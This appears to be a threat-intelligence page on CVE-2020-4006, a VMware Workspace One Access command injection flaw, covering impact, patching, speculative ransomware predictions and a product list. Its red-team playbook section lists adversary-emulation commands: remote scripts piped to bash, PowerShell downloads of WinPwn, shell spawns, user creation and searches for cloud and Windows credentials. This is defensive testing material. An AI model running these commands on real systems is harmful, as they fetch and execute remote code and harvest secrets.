CVE-2020-4006
Overview
This vulnerability is a command injection flaw rooted in improper input validation within VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector components. The flaw arises when user-supplied input is passed unsanitized to system-level commands, allowing execution of arbitrary shell commands. The affected components fail to adequately sanitize parameters in specific service endpoints, enabling injection of malicious commands.
Vulnerability Description
VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector address have a command injection vulnerability.
Impact
An attacker with high-privileged credentials can execute arbitrary commands on the underlying system hosting the affected VMware components. This allows full compromise of the host environment, including access to sensitive data and potential lateral movement within the network. The vulnerability requires authenticated access with elevated privileges, limiting exposure to authorized users but enabling complete system control once exploited. This can lead to data breaches, service disruption, and loss of system integrity.
Solution
VMware has addressed this issue in advisory VMSA-2020-0027. Users should upgrade affected products—Identity Manager and Identity Manager Connector—to versions later than 3.3.3. Detailed patching instructions and version-specific fixes are available at https://www.vmware.com/security/advisories/VMSA-2020-0027.html. No alternative workarounds are provided; applying the vendor-supplied patches is required to remediate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The command injection vulnerability present in VMware's Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector products allows an attacker to execute arbitrary commands on the underlying operating system. This flaw arises from improper input validation, which enables malicious actors to inject commands that the application executes with elevated privileges. The affected versions of these products, including various iterations of the Identity Manager and Access Connector, fail to adequately sanitize user inputs, making them susceptible to exploitation through crafted requests. The severity of this vulnerability is underscored by its high CVSS score of 9.1, indicating a critical risk to systems utilizing these applications.
Attack vectors for this vulnerability are diverse, with the most common being through web interfaces or APIs that interact with the affected products. An attacker could exploit this flaw by sending specially crafted requests that include malicious payloads, which the application would then execute. For instance, an attacker could manipulate parameters in a web form or API call to inject system commands. Once executed, these commands could lead to unauthorized access, data exfiltration, or even complete system compromise. The potential for exploitation is exacerbated in environments where these applications are deployed with high privileges, as the commands executed would inherit those permissions, amplifying the impact of a successful attack.
The real-world implications of this vulnerability are significant, particularly for organizations that rely on VMware's solutions for identity management and access control. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential compliance violations, especially in regulated industries. The business risks associated with such an incident include financial losses, reputational damage, and the costs associated with incident response and recovery efforts. Moreover, the presence of this vulnerability could expose organizations to further attacks, as compromised systems may serve as entry points for lateral movement within the network.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected products is crucial, as vendors typically release updates to address known vulnerabilities. Additionally, organizations should employ robust input validation mechanisms and implement web application firewalls (WAFs) to filter out malicious requests. Monitoring logs for unusual activity, such as unexpected command executions or access patterns, can also help in identifying potential exploitation attempts. Conducting regular security assessments and penetration testing can further enhance an organization’s security posture by identifying and addressing vulnerabilities before they can be exploited.
In summary, the command injection vulnerability in VMware's identity management solutions poses a serious threat to organizations that utilize these products. The potential for exploitation through various attack vectors highlights the need for vigilant security practices, including timely patching, input validation, and continuous monitoring. By adopting a proactive security strategy, organizations can mitigate the risks associated with this vulnerability and protect their critical assets from malicious actors.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2020-4006, rising by over 85% to place it near the top percentile of predicted exploitation likelihood. This upward trend, coupled with a steady increase in related exploit attempts observed over the past week, signals growing attacker interest and potential for exploitation despite the absence of new public exploit disclosures. While ransomware campaigns have not been definitively linked to this vulnerability, the association with the akira group underscores a persistent threat actor presence monitoring this vector. For defenders, this escalation in EPSS indicates that the vulnerability is becoming more attractive and feasible for exploitation in the wild, warranting heightened vigilance. Consequently, the threat level for CVE-2020-4006 should be considered elevated, reflecting an increased risk of active exploitation attempts that could impact organizations relying on VMware Workspace One Access and related products.
Update 2 — July 11, 2026
CSURFACE threat intelligence has detected a discernible uptick in activity related to CVE-2020-4006, with telemetry indicating a modest but meaningful increase in exploitation attempts targeting VMware Workspace One Access and associated components. Although the overall exploit landscape remains unchanged with no new public proof-of-concept exploits, this subtle rise in detection signals that threat actors continue to probe this vulnerability actively. The persistence of the akira group’s interest, despite the absence of confirmed ransomware campaigns leveraging this flaw, highlights ongoing reconnaissance or preparatory actions that could precede more aggressive exploitation. This development underscores the vulnerability’s sustained attractiveness as an attack vector, reinforcing its critical status. Consequently, defenders should interpret this trend as an indication of elevated risk, reflecting a higher likelihood of exploitation attempts that may impact environments running the affected VMware products.
Affected Products (13)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Identity Manager | 3.3.1 |
cpe:2.3:a:vmware:identity_manager:3.3.1:*:*:*:*:*:*:*
|
|
|
Vmware | Identity Manager | 3.3.2 |
cpe:2.3:a:vmware:identity_manager:3.3.2:*:*:*:*:*:*:*
|
|
|
Vmware | Identity Manager | 3.3.3 |
cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*
|
|
|
Vmware | Identity Manager Connector | 3.3.1 |
cpe:2.3:a:vmware:identity_manager_connector:3.3.1:*:*:*:*:*:*:*
|
|
|
Vmware | Identity Manager Connector | 3.3.2 |
cpe:2.3:a:vmware:identity_manager_connector:3.3.2:*:*:*:*:*:*:*
|
|
|
Vmware | One Access | 20.01 |
cpe:2.3:a:vmware:one_access:20.01:*:*:*:*:*:*:*
|
|
|
Vmware | One Access | 20.10 |
cpe:2.3:a:vmware:one_access:20.10:*:*:*:*:*:*:*
|
|
|
Vmware | Identity Manager Connector | 3.3.1 |
cpe:2.3:a:vmware:identity_manager_connector:3.3.1:*:*:*:*:*:*:*
|
|
|
Vmware | Identity Manager Connector | 3.3.2 |
cpe:2.3:a:vmware:identity_manager_connector:3.3.2:*:*:*:*:*:*:*
|
|
|
Vmware | Identity Manager Connector | 3.3.3 |
cpe:2.3:a:vmware:identity_manager_connector:3.3.3:*:*:*:*:*:*:*
|
|
|
Vmware | Cloud Foundation | 4.0 |
cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*
|
|
|
Vmware | Cloud Foundation | 4.0.1 |
cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*
|
|
|
Vmware | Vrealize Suite Lifecycle Manager | All |
cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-4006 |
| vmware.com |
GitHub CVE
x_refsource_MISC
|
https://www.vmware.com/security/advisories/VMSA-2020-0027.html |
| kb.cert.org |
NVD API
Third Party Advisory
US Government Resource
|
https://www.kb.cert.org/vuls/id/724367 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-4006 |